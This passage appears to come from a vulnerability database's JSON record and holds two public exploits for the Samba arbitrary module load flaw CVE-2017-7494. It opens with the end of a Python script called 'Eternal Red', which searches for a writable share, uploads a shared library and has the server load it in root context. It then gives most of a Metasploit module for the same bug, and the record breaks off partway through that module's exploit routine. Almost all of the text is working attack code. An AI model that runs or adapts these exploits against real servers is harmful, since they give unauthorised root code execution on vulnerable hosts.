hook_retrieveFile(self):\r\n self._retrieveFileFromOffset = self._retrieveFileFromOffset_SMB1Unix\r\n\r\n # This is maily the original listShares but request a higher level of info\r\n def listSharesEx(self, callback, errback, timeout = 30):\r\n if not self.has_authenticated:\r\n raise NotReadyError('SMB connection not authenticated')\r\n\r\n expiry_time = time.time() + timeout\r\n path = 'IPC$'\r\n messages_history = [ ]\r\n\r\n def connectSrvSvc(tid):\r\n m = SMB2Message(SMB2CreateRequest('srvsvc',\r\n file_attributes = 0,\r\n access_mask = FILE_READ_DATA | FILE_WRITE_DATA | FILE_APPEND_DATA | FILE_READ_EA | FILE_WRITE_EA | READ_CONTROL | FILE_READ_ATTRIBUTES | FILE_WRITE_ATTRIBUTES | SYNCHRONIZE,\r\n share_access = FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,\r\n oplock = SMB2_OPLOCK_LEVEL_NONE,\r\n impersonation = SEC_IMPERSONATE,\r\n create_options = FILE_NON_DIRECTORY_FILE | FILE_OPEN_NO_RECALL,\r\n create_disp = FILE_OPEN))\r\n\r\n m.tid = tid\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, connectSrvSvcCB, errback)\r\n messages_history.append(m)\r\n\r\n def connectSrvSvcCB(create_message, **kwargs):\r\n messages_history.append(create_message)\r\n if create_message.status == 0:\r\n call_id = self._getNextRPCCallID()\r\n # The data_bytes are binding call to Server Service RPC using DCE v1.1 RPC over SMB. See [MS-SRVS] and [C706]\r\n # If you wish to understand the meanings of the byte stream, I would suggest you use a recent version of WireShark to packet capture the stream\r\n data_bytes = \\\r\n binascii.unhexlify(b\"\"\"05 00 0b 03 10 00 00 00 74 00 00 00\"\"\".replace(b' ', b'')) + \\\r\n struct.pack('<I', call_id) + \\\r\n binascii.unhexlify(b\"\"\"\r\nb8 10 b8 10 00 00 00 00 02 00 00 00 00 00 01 00\r\nc8 4f 32 4b 70 16 d3 01 12 78 5a 47 bf 6e e1 88\r\n03 00 00 00 04 5d 88 8a eb 1c c9 11 9f e8 08 00\r\n2b 10 48 60 02 00 00 00 01 00 01 00 c8 4f 32 4b\r\n70 16 d3 01 12 78 5a 47 bf 6e e1 88 03 00 00 00\r\n2c 1c b7 6c 12 98 40 45 03 00 00 00 00 00 00 00\r\n01 00 00 00\r\n\"\"\".replace(b' ', b'').replace(b'\\n', b''))\r\n m = SMB2Message(SMB2WriteRequest(create_message.payload.fid, data_bytes, 0))\r\n m.tid = create_message.tid\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, rpcBindCB, errback, fid = create_message.payload.fid)\r\n messages_history.append(m)\r\n else:\r\n errback(OperationFailure('Failed to list shares: Unable to locate Server Service RPC endpoint', messages_history))\r\n\r\n def rpcBindCB(trans_message, **kwargs):\r\n messages_history.append(trans_message)\r\n if trans_message.status == 0:\r\n m = SMB2Message(SMB2ReadRequest(kwargs['fid'], read_len = 1024, read_offset = 0))\r\n m.tid = trans_message.tid\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, rpcReadCB, errback, fid = kwargs['fid'])\r\n messages_history.append(m)\r\n else:\r\n closeFid(trans_message.tid, kwargs['fid'], error = 'Failed to list shares: Unable to read from Server Service RPC endpoint')\r\n\r\n def rpcReadCB(read_message, **kwargs):\r\n messages_history.append(read_message)\r\n if read_message.status == 0:\r\n call_id = self._getNextRPCCallID()\r\n\r\n padding = b''\r\n remote_name = '\\\\\\\\' + self.remote_name\r\n server_len = len(remote_name) + 1\r\n server_bytes_len = server_len * 2\r\n if server_len % 2 != 0:\r\n padding = b'\\0\\0'\r\n server_bytes_len += 2\r\n\r\n # The data bytes are the RPC call to NetrShareEnum (Opnum 15) at Server Service RPC.\r\n # If you wish to understand the meanings of the byte stream, I would suggest you use a recent version of WireShark to packet capture the stream\r\n data_bytes = \\\r\n binascii.unhexlify(b\"\"\"05 00 00 03 10 00 00 00\"\"\".replace(b' ', b'')) + \\\r\n struct.pack('<HHI', 72+server_bytes_len, 0, call_id) + \\\r\n binascii.unhexlify(b\"\"\"4c 00 00 00 00 00 0f 00 00 00 02 00\"\"\".replace(b' ', b'')) + \\\r\n struct.pack('<III', server_len, 0, server_len) + \\\r\n (remote_name + '\\0').encode('UTF-16LE') + padding + \\\r\n binascii.unhexlify(b\"\"\"\r\n02 00 00 00 02 00 00 00 04 00 02 00 00 00 00 00\r\n00 00 00 00 ff ff ff ff 00 00 00 00 00 00 00 00\r\n\"\"\".replace(b' ', b'').replace(b'\\n', b''))\r\n m = SMB2Message(SMB2IoctlRequest(kwargs['fid'], 0x0011C017, flags = 0x01, max_out_size = 8196, in_data = data_bytes))\r\n m.tid = read_message.tid\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, listShareResultsCB, errback, fid = kwargs['fid'])\r\n messages_history.append(m)\r\n else:\r\n closeFid(read_message.tid, kwargs['fid'], error = 'Failed to list shares: Unable to bind to Server Service RPC endpoint')\r\n\r\n def listShareResultsCB(result_message, **kwargs):\r\n messages_history.append(result_message)\r\n if result_message.status == 0:\r\n # The payload.data_bytes will contain the results of the RPC call to NetrShareEnum (Opnum 15) at Server Service RPC.\r\n data_bytes = result_message.payload.out_data\r\n\r\n if data_bytes[3] & 0x02 == 0:\r\n sendReadRequest(result_message.tid, kwargs['fid'], data_bytes)\r\n else:\r\n decodeResults(result_message.tid, kwargs['fid'], data_bytes)\r\n elif result_message.status == 0x0103: # STATUS_PENDING\r\n self.pending_requests[result_message.mid] = _PendingRequest(result_message.mid, expiry_time, listShareResultsCB, errback, fid = kwargs['fid'])\r\n else:\r\n closeFid(result_message.tid, kwargs['fid'])\r\n errback(OperationFailure('Failed to list shares: Unable to retrieve shared device list', messages_history))\r\n\r\n def decodeResults(tid, fid, data_bytes):\r\n shares_count = struct.unpack('<I', data_bytes[36:40])[0]\r\n results = [ ] # A list of SharedDevice2 instances\r\n offset = 36 + 52 # You need to study the byte stream to understand the meaning of these constants\r\n for i in range(0, shares_count):\r\n results.append(SharedDevice(struct.unpack('<I', data_bytes[offset+4:offset+8])[0], None, None))\r\n offset += 12\r\n\r\n for i in range(0, shares_count):\r\n max_length, _, length = struct.unpack('<III', data_bytes[offset:offset+12])\r\n offset += 12\r\n results[i].name = data_bytes[offset:offset+length*2-2].decode('UTF-16LE')\r\n\r\n if length % 2 != 0:\r\n offset += (length * 2 + 2)\r\n else:\r\n offset += (length * 2)\r\n\r\n max_length, _, length = struct.unpack('<III', data_bytes[offset:offset+12])\r\n offset += 12\r\n results[i].comments = data_bytes[offset:offset+length*2-2].decode('UTF-16LE')\r\n\r\n if length % 2 != 0:\r\n offset += (length * 2 + 2)\r\n else:\r\n offset += (length * 2)\r\n\r\n max_length, _, length = struct.unpack('<III', data_bytes[offset:offset+12])\r\n offset += 12\r\n results[i].path = data_bytes[offset:offset+length*2-2].decode('UTF-16LE')\r\n\r\n if length % 2 != 0:\r\n offset += (length * 2 + 2)\r\n else:\r\n offset += (length * 2)\r\n\r\n max_length, _, length = struct.unpack('<III', data_bytes[offset:offset+12])\r\n offset += 12\r\n results[i].password = data_bytes[offset:offset+length*2-2].decode('UTF-16LE')\r\n\r\n if length % 2 != 0:\r\n offset += (length * 2 + 2)\r\n else:\r\n offset += (length * 2)\r\n\r\n\r\n closeFid(tid, fid)\r\n callback(results)\r\n\r\n def sendReadRequest(tid, fid, data_bytes):\r\n read_count = min(4280, self.max_read_size)\r\n m = SMB2Message(SMB2ReadRequest(fid, 0, read_count))\r\n m.tid = tid\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, int(time.time()) + timeout, readCB, errback,\r\n fid = fid, data_bytes = data_bytes)\r\n\r\n def readCB(read_message, **kwargs):\r\n messages_history.append(read_message)\r\n if read_message.status == 0:\r\n data_len = read_message.payload.data_length\r\n data_bytes = read_message.payload.data\r\n\r\n if data_bytes[3] & 0x02 == 0:\r\n sendReadRequest(read_message.tid, kwargs['fid'], kwargs['data_bytes'] + data_bytes[24:data_len-24])\r\n else:\r\n decodeResults(read_message.tid, kwargs['fid'], kwargs['data_bytes'] + data_bytes[24:data_len-24])\r\n else:\r\n closeFid(read_message.tid, kwargs['fid'])\r\n errback(OperationFailure('Failed to list shares: Unable to retrieve shared device list', messages_history))\r\n\r\n def closeFid(tid, fid, results = None, error = None):\r\n m = SMB2Message(SMB2CloseRequest(fid))\r\n m.tid = tid\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, closeCB, errback, results = results, error = error)\r\n messages_history.append(m)\r\n\r\n def closeCB(close_message, **kwargs):\r\n if kwargs['results'] is not None:\r\n callback(kwargs['results'])\r\n elif kwargs['error'] is not None:\r\n errback(OperationFailure(kwargs['error'], messages_history))\r\n\r\n if path not in self.connected_trees:\r\n def connectCB(connect_message, **kwargs):\r\n messages_history.append(connect_message)\r\n if connect_message.status == 0:\r\n self.connected_trees[path] = connect_message.tid\r\n connectSrvSvc(connect_message.tid)\r\n else:\r\n errback(OperationFailure('Failed to list shares: Unable to connect to IPC$', messages_history))\r\n\r\n m = SMB2Message(SMB2TreeConnectRequest(r'\\\\%s\\%s' % ( self.remote_name.upper(), path )))\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, connectCB, errback, path = path)\r\n messages_history.append(m)\r\n else:\r\n connectSrvSvc(self.connected_trees[path])\r\n\r\n\r\n # Don't convert to Window style path\r\n def _retrieveFileFromOffset_SMB1Unix(self, service_name, path, file_obj, callback, errback, starting_offset, max_length, timeout = 30):\r\n if not self.has_authenticated:\r\n raise NotReadyError('SMB connection not authenticated')\r\n\r\n messages_history = [ ]\r\n\r\n\r\n def sendOpen(tid):\r\n m = SMBMessage(ComOpenAndxRequest(filename = path,\r\n access_mode = 0x0040, # Sharing mode: Deny nothing to others\r\n open_mode = 0x0001, # Failed if file does not exist\r\n search_attributes = SMB_FILE_ATTRIBUTE_HIDDEN | SMB_FILE_ATTRIBUTE_SYSTEM,\r\n timeout = timeout * 1000))\r\n m.tid = tid\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, int(time.time()) + timeout, openCB, errback)\r\n messages_history.append(m)\r\n\r\n def openCB(open_message, **kwargs):\r\n messages_history.append(open_message)\r\n if not open_message.status.hasError:\r\n if max_length == 0:\r\n closeFid(open_message.tid, open_message.payload.fid)\r\n callback(( file_obj, open_message.payload.file_attributes, 0 ))\r\n else:\r\n sendRead(open_message.tid, open_message.payload.fid, starting_offset, open_message.payload.file_attributes, 0, max_length)\r\n else:\r\n errback(OperationFailure('Failed to retrieve %s on %s: Unable to open file' % ( path, service_name ), messages_history))\r\n\r\n def sendRead(tid, fid, offset, file_attributes, read_len, remaining_len):\r\n read_count = self.max_raw_size - 2\r\n m = SMBMessage(ComReadAndxRequest(fid = fid,\r\n offset = offset,\r\n max_return_bytes_count = read_count,\r\n min_return_bytes_count = min(0xFFFF, read_count)))\r\n m.tid = tid\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, int(time.time()) + timeout, readCB, errback, fid = fid, offset = offset, file_attributes = file_attributes,\r\n read_len = read_len, remaining_len = remaining_len)\r\n\r\n def readCB(read_message, **kwargs):\r\n # To avoid crazy memory usage when retrieving large files, we do not save every read_message in messages_history.\r\n if not read_message.status.hasError:\r\n read_len = kwargs['read_len']\r\n remaining_len = kwargs['remaining_len']\r\n data_len = read_message.payload.data_length\r\n if max_length > 0:\r\n if data_len > remaining_len:\r\n file_obj.write(read_message.payload.data[:remaining_len])\r\n read_len += remaining_len\r\n remaining_len = 0\r\n else:\r\n file_obj.write(read_message.payload.data)\r\n remaining_len -= data_len\r\n read_len += data_len\r\n else:\r\n file_obj.write(read_message.payload.data)\r\n read_len += data_len\r\n\r\n if (max_length > 0 and remaining_len <= 0) or data_len < (self.max_raw_size - 2):\r\n closeFid(read_message.tid, kwargs['fid'])\r\n callback(( file_obj, kwargs['file_attributes'], read_len )) # Note that this is a tuple of 3-elements\r\n else:\r\n sendRead(read_message.tid, kwargs['fid'], kwargs['offset']+data_len, kwargs['file_attributes'], read_len, remaining_len)\r\n else:\r\n messages_history.append(read_message)\r\n closeFid(read_message.tid, kwargs['fid'])\r\n errback(OperationFailure('Failed to retrieve %s on %s: Read failed' % ( path, service_name ), messages_history))\r\n\r\n def closeFid(tid, fid):\r\n m = SMBMessage(ComCloseRequest(fid))\r\n m.tid = tid\r\n self._sendSMBMessage(m)\r\n messages_history.append(m)\r\n\r\n if service_name not in self.connected_trees:\r\n def connectCB(connect_message, **kwargs):\r\n messages_history.append(connect_message)\r\n if not connect_message.status.hasError:\r\n self.connected_trees[service_name] = connect_message.tid\r\n sendOpen(connect_message.tid)\r\n else:\r\n errback(OperationFailure('Failed to retrieve %s on %s: Unable to connect to shared device' % ( path, service_name ), messages_history))\r\n\r\n m = SMBMessage(ComTreeConnectAndxRequest(r'\\\\%s\\%s' % ( self.remote_name.upper(), service_name ), SERVICE_ANY, ''))\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, int(time.time()) + timeout, connectCB, errback, path = service_name)\r\n messages_history.append(m)\r\n else:\r\n sendOpen(self.connected_trees[service_name])\r\n\r\ndef get_connection(user, password, server, port, force_smb1=False):\r\n if force_smb1:\r\n smb_structs.SUPPORT_SMB2 = False\r\n\r\n conn = SMBConnectionEx(user, password, \"\", \"server\")\r\n assert conn.connect(server, port)\r\n return conn\r\n\r\ndef get_share_info(conn):\r\n conn.hook_listShares()\r\n return conn.listShares()\r\n\r\ndef find_writeable_share(conn, shares):\r\n print(\"[+] Searching for writable share\")\r\n filename = \"red\"\r\n test_file = tempfile.TemporaryFile()\r\n for share in shares:\r\n try:\r\n # If it's not writeable this will throw\r\n conn.storeFile(share.name, filename, test_file)\r\n conn.deleteFiles(share.name, filename)\r\n print(\"[+] Found writeable share: \" + share.name)\r\n return share\r\n except:\r\n pass\r\n\r\n return None\r\n\r\ndef write_payload(conn, share, payload, payload_name):\r\n with open(payload, \"rb\") as fin:\r\n conn.storeFile(share.name, payload_name, fin)\r\n\r\n return True\r\n\r\ndef convert_share_path(share):\r\n path = share.path[2:]\r\n path = path.replace(\"\\\\\", \"/\")\r\n return path\r\n\r\ndef load_payload(user, password, server, port, fullpath):\r\n conn = get_connection(user, password, server, port, force_smb1 = True)\r\n conn.hook_retrieveFile()\r\n\r\n print(\"[+] Attempting to load payload\")\r\n temp_file = tempfile.TemporaryFile()\r\n\r\n try:\r\n conn.retrieveFile(\"IPC$\", \"\\\\\\\\PIPE\\\\\" + fullpath, temp_file)\r\n except:\r\n pass\r\n\r\n return\r\n\r\ndef drop_payload(user, password, server, port, payload):\r\n payload_name = \"charizard\"\r\n\r\n conn = get_connection(user, password, server, port)\r\n shares = get_share_info(conn)\r\n share = find_writeable_share(conn, shares)\r\n\r\n if share is None:\r\n print(\"[!] No writeable shares on \" + server + \" for user: \" + user)\r\n sys.exit(-1)\r\n\r\n if not write_payload(conn, share, payload, payload_name):\r\n print(\"[!] Failed to write payload: \" + str(payload) + \" to server\")\r\n sys.exit(-1)\r\n\r\n conn.close()\r\n\r\n fullpath = convert_share_path(share)\r\n return os.path.join(fullpath, payload_name)\r\n\r\n\r\ndef main():\r\n parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter,\r\n description= \"\"\"Eternal Red Samba Exploit -- CVE-2017-7494\r\n Causes vulnerable Samba server to load a shared library in root context\r\n Credentials are not required if the server has a guest account\r\n For remote exploit you must have write permissions to at least one share\r\n Eternal Red will scan the Samba server for shares it can write to\r\n It will also determine the fullpath of the remote share\r\n\r\n For local exploit provide the full path to your shared library to load\r\n\r\n Your shared library should look something like this\r\n\r\n extern bool change_to_root_user(void);\r\n int samba_init_module(void)\r\n {\r\n change_to_root_user();\r\n /* Do what thou wilt */\r\n }\r\n \"\"\")\r\n parser.add_argument(\"payload\", help=\"path to shared library to load\", type=str)\r\n parser.add_argument(\"server\", help=\"Server to target\", type=str)\r\n parser.add_argument(\"-p\", \"--port\", help=\"Port to use defaults to 445\", type=int)\r\n parser.add_argument(\"-u\", \"--username\", help=\"Username to connect as defaults to nobody\", type=str)\r\n parser.add_argument(\"--password\", help=\"Password for user default is empty\", type=str)\r\n parser.add_argument(\"--local\", help=\"Perform local attack. Payload should be fullpath!\", type=bool)\r\n args = parser.parse_args()\r\n\r\n if not os.path.isfile(args.payload):\r\n print(\"[!] Unable to open: \" + args.payload)\r\n sys.exit(-1)\r\n\r\n port = 445\r\n user = \"nobody\"\r\n password = \"\"\r\n fullpath = \"\"\r\n\r\n if args.port:\r\n port = args.port\r\n if args.username:\r\n user = args.username\r\n if args.password:\r\n password = args.password\r\n\r\n if args.local:\r\n fullpath = args.payload\r\n else:\r\n fullpath = drop_payload(user, password, args.server, port, args.payload)\r\n\r\n load_payload(user, password, args.server, port, fullpath)\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/42060/"}, {"lastseen": "2017-05-30T11:49:14", "description": "Samba - 'is_known_pipename()' Arbitrary Module Load (Metasploit). CVE-2017-7494. Remote exploit for Linux platform. Tags: Metasploit Framework", "published": "2017-05-29T00:00:00", "type": "exploitdb", "title": "Samba - 'is_known_pipename()' Arbitrary Module Load (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7494"], "modified": "2017-05-29T00:00:00", "id": "EDB-ID:42084", "href": "https://www.exploit-db.com/exploits/42084/", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::DCERPC\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Samba is_known_pipename() Arbitrary Module Load',\r\n 'Description' => %q{\r\n This module triggers an arbitrary shared library load vulnerability\r\n in Samba versions 3.5.0 to 4.4.14, 4.5.10, and 4.6.4. This module\r\n requires valid credentials, a writeable folder in an accessible share,\r\n and knowledge of the server-side path of the writeable folder. In\r\n some cases, anonymous access combined with common filesystem locations\r\n can be used to automatically exploit this vulnerability.\r\n },\r\n 'Author' =>\r\n [\r\n 'steelo <knownsteelo[at]gmail.com>', # Vulnerability Discovery\r\n 'hdm', # Metasploit Module\r\n 'Brendan Coles <bcoles[at]gmail.com>', # Check logic\r\n 'Tavis Ormandy <taviso[at]google.com>', # PID hunting technique\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2017-7494' ],\r\n [ 'URL', 'https://www.samba.org/samba/security/CVE-2017-7494.html' ],\r\n ],\r\n 'Payload' =>\r\n {\r\n 'Space' => 9000,\r\n 'DisableNops' => true\r\n },\r\n 'Platform' => 'linux',\r\n #\r\n # Targets are currently limited by platforms with ELF-SO payload wrappers\r\n #\r\n 'Targets' =>\r\n [\r\n\r\n [ 'Linux x86', { 'Arch' => ARCH_X86 } ],\r\n [ 'Linux x86_64', { 'Arch' => ARCH_X64 } ],\r\n #\r\n # Not ready yet\r\n # [ 'Linux ARM (LE)', { 'Arch' => ARCH_ARMLE } ],\r\n # [ 'Linux MIPS', { 'Arch' => MIPS } ],\r\n ],\r\n 'Privileged' => true,\r\n 'DisclosureDate' => 'Mar 24 2017',\r\n 'DefaultTarget' => 1))\r\n\r\n register_options(\r\n [\r\n OptString.new('SMB_SHARE_NAME', [false, 'The name of the SMB share containing a writeable directory']),\r\n OptString.new('SMB_SHARE_BASE', [false, 'The remote filesystem path correlating with the SMB share name']),\r\n OptString.new('SMB_FOLDER', [false, 'The directory to use within the writeable SMB share']),\r\n ])\r\n\r\n register_advanced_options(\r\n [\r\n OptBool.new('BruteforcePID', [false, 'Attempt to use two connections to bruteforce the PID working directory', false]),\r\n ])\r\n end\r\n\r\n\r\n def generate_common_locations\r\n candidates = []\r\n if datastore['SMB_SHARE_BASE'].to_s.length > 0\r\n candidates << datastore['SMB_SHARE_BASE']\r\n end\r\n\r\n %W{ /volume1 /volume2 /volume3 /volume4\r\n /shared /mnt /mnt/usb /media /mnt/media\r\n /var/samba /tmp /home /home/shared\r\n }.each do |base_name|\r\n candidates << base_name\r\n candidates << [base_name, @share]\r\n candidates << [base_name, @share.downcase]\r\n candidates << [base_name, @share.upcase]\r\n candidates << [base_name, @share.capitalize]\r\n candidates << [base_name, @share.gsub(\" \", \"_\")]\r\n end\r\n\r\n candidates.uniq\r\n end\r\n\r\n def enumerate_directories(share)\r\n begin\r\n self.simple.connect(\"\\\\\\\\#{rhost}\\\\#{share}\")\r\n stuff = self.simple.client.find_first(\"\\\\*\")\r\n directories = [\"\"]\r\n stuff.each_pair do |entry,entry_attr|\r\n next if %W{. ..}.include?(entry)\r\n next unless entry_attr['type'] == 'D'\r\n directories << entry\r\n end\r\n\r\n return directories\r\n\r\n rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e\r\n vprint_error(\"Enum #{share}: #{e}\")\r\n return nil\r\n\r\n ensure\r\n if self.simple.shares[\"\\\\\\\\#{rhost}\\\\#{share}\"]\r\n self.simple.disconnect(\"\\\\\\\\#{rhost}\\\\#{share}\")\r\n end\r\n end\r\n end\r\n\r\n def verify_writeable_directory(share, directory=\"\")\r\n begin\r\n self.simple.connect(\"\\\\\\\\#{rhost}\\\\#{share}\")\r\n\r\n random_filename = Rex::Text.rand_text_alpha(5)+\".txt\"\r\n filename = directory.length == 0 ? \"\\\\#{random_filename}\" : \"\\\\#{directory}\\\\#{random_filename}\"\r\n\r\n wfd = simple.open(filename, 'rwct')\r\n wfd << Rex::Text.rand_text_alpha(8)\r\n wfd.close\r\n\r\n simple.delete(filename)\r\n return true\r\n\r\n rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e\r\n vprint_error(\"Write #{share}#{filename}: #{e}\")\r\n return false\r\n\r\n ensure\r\n if self.simple.shares[\"\\\\\\\\#{rhost}\\\\#{share}\"]\r\n self.simple.disconnect(\"\\\\\\\\#{rhost}\\\\#{share}\")\r\n end\r\n end\r\n end\r\n\r\n def share_type(val)\r\n [ 'DISK', 'PRINTER', 'DEVICE', 'IPC', 'SPECIAL', 'TEMPORARY' ][val]\r\n end\r\n\r\n def enumerate_shares_lanman\r\n shares = []\r\n begin\r\n res = self.simple.client.trans(\r\n \"\\\\PIPE\\\\LANMAN\",\r\n (\r\n [0x00].pack('v') +\r\n \"WrLeh\\x00\" +\r\n \"B13BWz\\x00\" +\r\n [0x01, 65406].pack(\"vv\")\r\n ))\r\n rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e\r\n vprint_error(\"Could not enumerate shares via LANMAN\")\r\n return []\r\n end\r\n if res.nil?\r\n vprint_error(\"Could not enumerate shares via LANMAN\")\r\n return []\r\n end\r\n\r\n lerror, lconv, lentries, lcount = res['Payload'].to_s[\r\n res['Payload'].v['ParamOffset'],\r\n res['Payload'].v['ParamCount']\r\n ].unpack(\"v4\")\r\n\r\n data = res['Payload'].to_s[\r\n res['Payload'].v['DataOffset'],\r\n res['Payload'].v['DataCount']\r\n ]\r\n\r\n 0.upto(lentries - 1) do |i|\r\n sname,tmp = data[(i * 20) + 0, 14].split(\"\\x00\")\r\n stype = data[(i * 20) + 14, 2].unpack('v')[0]\r\n scoff = data[(i * 20) + 16, 2].unpack('v')[0]\r\n scoff -= lconv if lconv != 0\r\n scomm,tmp = data[scoff, data.length - scoff].split(\"\\x00\")\r\n shares << [ sname, share_type(stype), scomm]\r\n end\r\n\r\n shares\r\n end\r\n\r\n def probe_module_path(path, simple_client=self.simple)\r\n begin\r\n simple_client.create_pipe(path)\r\n rescue Rex::Proto::SMB::Exceptions::ErrorCode => e\r\n vprint_error(\"Probe: #{path}: #{e}\")\r\n end\r\n end\r\n\r\n def find_writeable_path(share)\r\n subdirs = enumerate_directories(share)\r\n return unless subdirs\r\n\r\n if datastore['SMB_FOLDER'].to_s.length > 0\r\n subdirs.unshift(datastore['SMB_FOLDER'])\r\n end\r\n\r\n subdirs.each do |subdir|\r\n next unless verify_writeable_directory(share, subdir)\r\n return subdir\r\n end\r\n\r\n nil\r\n end\r\n\r\n def find_writeable_share_path\r\n @path = nil\r\n share_info = enumerate_shares_lanman\r\n if datastore['SMB_SHARE_NAME'].to_s.length > 0\r\n share_info.unshift [datastore['SMB_SHARE_NAME'], 'DISK', '']\r\n end\r\n\r\n share_info.each do |share|\r\n next if share.first.upcase == 'IPC$'\r\n found = find_writeable_path(share.first)\r\n next unless found\r\n @share = share.first\r\n @path = found\r\n break\r\n end\r\n end\r\n\r\n def find_writeable\r\n find_writeable_share_path\r\n unless @share && @path\r\n print_error(\"No suiteable share and path were found, try setting SMB_SHARE_NAME and SMB_FOLDER\")\r\n fail_with(Failure::NoTarget, \"No matching target\")\r\n end\r\n print_status(\"Using location \\\\\\\\#{rhost}\\\\#{@share}\\\\#{@path} for the path\")\r\n end\r\n\r\n def upload_payload\r\n begin\r\n self.simple.connect(\"\\\\\\\\#{rhost}\\\\#{@share}\")\r\n\r\n random_filename = Rex::Text.rand_text_alpha(8)+\".so\"\r\n filename = @path.length == 0 ? \"\\\\#{random_filename}\" : \"\\\\#{@path}\\\\#{random_filename}\"\r\n wfd = simple.open(filename, 'rwct')\r\n wfd << Msf::Util::EXE.to_executable_fmt(framework, target.arch, target.platform,\r\n payload.encoded, \"elf-so\", {:arch => target.arch, :platform => target.platform}\r\n )\r\n wfd.close\r\n\r\n @payload_name = random_filename\r\n return true\r\n\r\n rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e\r\n print_error(\"Write #{@share}#{filename}: #{e}\")\r\n return false\r\n\r\n ensure\r\n if self.simple.shares[\"\\\\\\\\#{rhost}\\\\#{@share}\"]\r\n self.simple.disconnect(\"\\\\\\\\#{rhost}\\\\#{@share}\")\r\n end\r\n end\r\n end\r\n\r\n def find_payload\r\n\r\n # Reconnect to IPC$\r\n simple.connect(\"\\\\\\\\#{rhost}\\\\IPC$\")\r\n\r\n # Look for common paths first, since they can be a lot quicker than hunting PIDs\r\n print_status(\"Hunting for payload using common path names: #{@payload_name} - //#{rhost}/#{@share}/#{@path}\")\r\n generate_common_locations.each do |location|\r\n target = [location, @path, @payload_name].join(\"/\").gsub(/\\/+/, '/')\r\n print_status(\"Trying location #{target}...\")\r\n probe_module_path(target)\r\n end\r\n\r\n # Exit early if we already have a session\r\n return if session_created?\r\n\r\n return unless datastore['BruteforcePID']\r\n\r\n # XXX: This technique doesn't seem to work in practice, as both processes have setuid()d\r\n # to non-root, but their /proc/pid directories are still owned by root. Trying to\r\n # read the /proc/other-pid/cwd/target.so results in permission denied. There is a\r\n # good chance that this still works on some embedded systems and odd-ball Linux.\r\n\r\n # Use the PID hunting strategy devised by Tavis Ormandy\r\n print_status(\"Hunting for payload using PID search: #{@payload_name} - //#{rhost}/#{@share}/#{@path} (UNLIKELY TO WORK!)\")\r\n\r\n # Configure the main connection to have a working directory of the file share\r\n simple.connect(\"\\\\\\\\#{rhost}\\\\#{@share}\")\r\n\r\n # Use a second connection to brute force the PID of the first connection\r\n probe_conn = connect(false)\r\n smb_login(probe_conn)\r\n probe_conn.connect(\"\\\\\\\\#{rhost}\\\\#{@share}\")\r\n probe_conn.connect(\"\\\\\\\\#{rhost}\\\\IPC$\")\r\n\r\n # Run from 2 to MAX_PID (ushort) trying to read the other process CWD\r\n 2.upto(32768) do |pid|\r\n\r\n # Look for the PID associated with our main SMB connection\r\n target = [\"/proc/#{pid}/cwd\", @path, @payload_name].join(\"/\").gsub(/\\/+/, '/')\r\n vprint_status(\"Trying PID with target path #{target}...\")\r\n probe_module_path(target, probe_conn)\r\n\r\n # Keep our main connection alive\r\n if pid % 1000 == 0\r\n self.simple.client.find_first(\"\\\\*\")\r\n end\r\n end\r\n\r\n end\r\n\r\n def check\r\n res = smb_fingerprint\r\n\r\n unless res['native_lm'] =~ /Samba ([\\d\\.]+)/\r\n print_error(\"does not appear to be Samba: #{res['os']} / #{res['native_lm']}\")\r\n return CheckCode::Safe\r\n end\r\n\r\n samba_version = Gem::Version.new($1.gsub(/\\.$/, ''))\r\n\r\n vprint_status(\"Samba version identified as #{samba_version.to_s}\")\r\n\r\n if samba_version < Gem::Version.new('3.5.0')\r\n return CheckCode::Safe\r\n end\r\n\r\n # Patched in 4.4.14\r\n if samba_version < Gem::Version.new('4.5.0') &&\r\n samba_version >= Gem::Version.new('4.4.14')\r\n return CheckCode::Safe\r\n end\r\n\r\n # Patched in 4.5.10\r\n if samba_version > Gem::Version.new('4.5.0') &&\r\n samba_version < Gem::Version.new('4.6.0') &&\r\n samba_version >= Gem::Version.new('4.5.10')\r\n return CheckCode::Safe\r\n end\r\n\r\n # Patched in 4.6.4\r\n if samba_version >= Gem::Version.new('4.6.4')\r\n return CheckCode::Safe\r\n end\r\n\r\n connect\r\n smb_login\r\n find_writeable_share_path\r\n disconnect\r\n\r\n if @share.to_s.length == 0\r\n print_status(\"Samba version #{samba_version.to_s} found, but no writeable share has been identified\")\r\n return CheckCode::Detected\r\n end\r\n\r\n print_good(\"Samba version #{samba_version.to_s} found with writeable share '#{@share}'\")\r\n return CheckCode::Appears\r\n end\r\n\r\n def exploit\r\n # Setup SMB\r\n connect\r\n smb_login\r\n\r\n # Find a writeable share\r\n find_writeable\r\n\r\n # 